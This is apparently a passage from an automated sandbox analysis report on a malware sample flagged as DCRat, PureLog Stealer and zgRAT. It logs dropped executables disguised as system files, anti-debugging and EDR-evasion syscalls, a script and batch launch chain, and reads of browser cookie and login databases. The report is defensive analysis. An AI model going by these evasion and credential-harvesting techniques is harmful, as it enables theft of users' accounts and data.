                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 584639
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 584526
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 584279
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 583958
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 583813
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 583688
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 583563
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 583453
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\debug\explorer.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockhostnet\msinto.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: q9BeTagoKR.21.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                                    Source: q9BeTagoKR.21.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                                    Source: q9BeTagoKR.21.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                                    Source: q9BeTagoKR.21.drBinary or memory string: discord.comVMware20,11696487552f
                                    Source: q9BeTagoKR.21.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                                    Source: q9BeTagoKR.21.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                                    Source: wscript.exe, 00000005.00000003.2351888371.00000000027ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: q9BeTagoKR.21.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                                    Source: q9BeTagoKR.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                                    Source: q9BeTagoKR.21.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                                    Source: q9BeTagoKR.21.drBinary or memory string: global block list test formVMware20,11696487552
                                    Source: q9BeTagoKR.21.drBinary or memory string: tasks.office.comVMware20,11696487552o
                                    Source: conhost.exe, 00000015.00000002.3417373379.0000000012441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: utyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                    Source: q9BeTagoKR.21.drBinary or memory string: AMC password management pageVMware20,11696487552
                                    Source: w32tm.exe, 00000014.00000002.2439210308.0000026B5CDB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: q9BeTagoKR.21.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                                    Source: q9BeTagoKR.21.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                                    Source: q9BeTagoKR.21.drBinary or memory string: dev.azure.comVMware20,11696487552j
                                    Source: q9BeTagoKR.21.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                                    Source: q9BeTagoKR.21.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                                    Source: conhost.exe, 00000015.00000002.3548003600.000000001AD10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|][
                                    Source: q9BeTagoKR.21.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                                    Source: q9BeTagoKR.21.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                                    Source: q9BeTagoKR.21.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                                    Source: q9BeTagoKR.21.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                                    Source: q9BeTagoKR.21.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                                    Source: q9BeTagoKR.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                                    Source: q9BeTagoKR.21.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                                    Source: q9BeTagoKR.21.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                                    Source: q9BeTagoKR.21.drBinary or memory string: outlook.office.comVMware20,11696487552s
                                    Source: q9BeTagoKR.21.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                                    Source: q9BeTagoKR.21.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                                    Source: q9BeTagoKR.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                                    Source: q9BeTagoKR.21.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                                    Source: q9BeTagoKR.21.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-24036
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeSystem information queried: ModuleInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    barindex
                                    Hides threads from debuggers
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeThread information set: HideFromDebuggerJump to behavior
                                    Tries to detect debuggers (CloseHandle check)
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeHandle closed: DEADC0DE
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeProcess queried: DebugObjectHandleJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeProcess queried: DebugObjectHandleJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeProcess queried: DebugPortJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0084F838
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_00857DEE mov eax, dword ptr fs:[00000030h]2_2_00857DEE
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0085C030 GetProcessHeap,2_2_0085C030
                                    Source: C:\blockhostnet\msinto.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0084F838
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084F9D5 SetUnhandledExceptionFilter,2_2_0084F9D5
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0084FBCA
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_00858EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00858EBD
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Found direct / indirect Syscall (likely to bypass EDR)
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeNtQuerySystemInformation: Direct from: 0x1408B943EJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeNtProtectVirtualMemory: Indirect: 0x14033F642Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeNtQueryInformationProcess: Direct from: 0x1408B940AJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeNtQueryInformationProcess: Direct from: 0x1408B93D6Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeNtProtectVirtualMemory: Direct from: 0x1408B946BJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeNtQuerySystemInformation: Direct from: 0x1408B94ADJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeNtQuerySystemInformation: Direct from: 0x1408B93AEJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeNtQuerySystemInformation: Direct from: 0x1408B93CDJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeProcess created: C:\Users\user\AppData\Local\Temp\explorer.exe "C:\Users\user\AppData\Local\Temp\explorer.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockhostnet\msinto.exe "C:\blockhostnet/msinto.exe"Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline"Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline"Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CA.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB531.tmp" "c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                    Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000015.00000002.3361148000.0000000002730000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .1",5,1,"","user","675052","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\msbuild\\Microsoft\\Windows Workflow Foundation","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.33","US / United States of America","Ne
                                    Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                                    Source: conhost.exe, 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","675052","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\msbuild\\Microsoft\\Windows Workflow Foundation","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084F654 cpuid 2_2_0084F654
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: GetLocaleInfoW,GetNumberFormatW,2_2_0084AF0F
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeQueries volume information: C:\Users\user\Desktop\Zn0uX5K1ez.exe VolumeInformationJump to behavior
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                                    Source: C:\blockhostnet\msinto.exeQueries volume information: C:\blockhostnet\msinto.exe VolumeInformationJump to behavior
                                    Source: C:\blockhostnet\msinto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeQueries volume information: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe VolumeInformation
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeQueries volume information: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformation
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeQueries volume information: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe VolumeInformation
                                    Source: C:\Windows\debug\explorer.exeQueries volume information: C:\Windows\debug\explorer.exe VolumeInformation
                                    Source: C:\blockhostnet\msinto.exeQueries volume information: C:\blockhostnet\msinto.exe VolumeInformation
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeQueries volume information: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe VolumeInformation
                                    Source: C:\Recovery\lsass.exeQueries volume information: C:\Recovery\lsass.exe VolumeInformation
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeQueries volume information: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe VolumeInformation
                                    Source: C:\Windows\debug\explorer.exeQueries volume information: C:\Windows\debug\explorer.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,2_2_0084DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0083B146 GetVersionExW,2_2_0083B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000A.00000002.2399954472.000000001312B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: msinto.exe PID: 6248, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 1924, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: hPeZTHbzcsUskSflSyozwAqUA.exe PID: 3352, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: Zn0uX5K1ez.exe, type: SAMPLE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 10.0.msinto.exe.a00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b124a5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4625570.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000002.00000003.2104402669.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000002.00000003.2103951252.0000000006000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.2096226398.0000000000B12000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000A.00000000.2352080688.0000000000A02000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2119459063.0000000004625000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockhostnet\msinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\debug\explorer.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\lsass.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: Zn0uX5K1ez.exe, type: SAMPLE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.684e6bb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 2.3.svchost.exe.604e6bb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 10.0.msinto.exe.a00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4673c32.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b124a5.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b60b67.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.Zn0uX5K1ez.exe.b10000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.Zn0uX5K1ez.exe.4625570.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockhostnet\msinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\debug\explorer.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\lsass.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, type: DROPPED
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
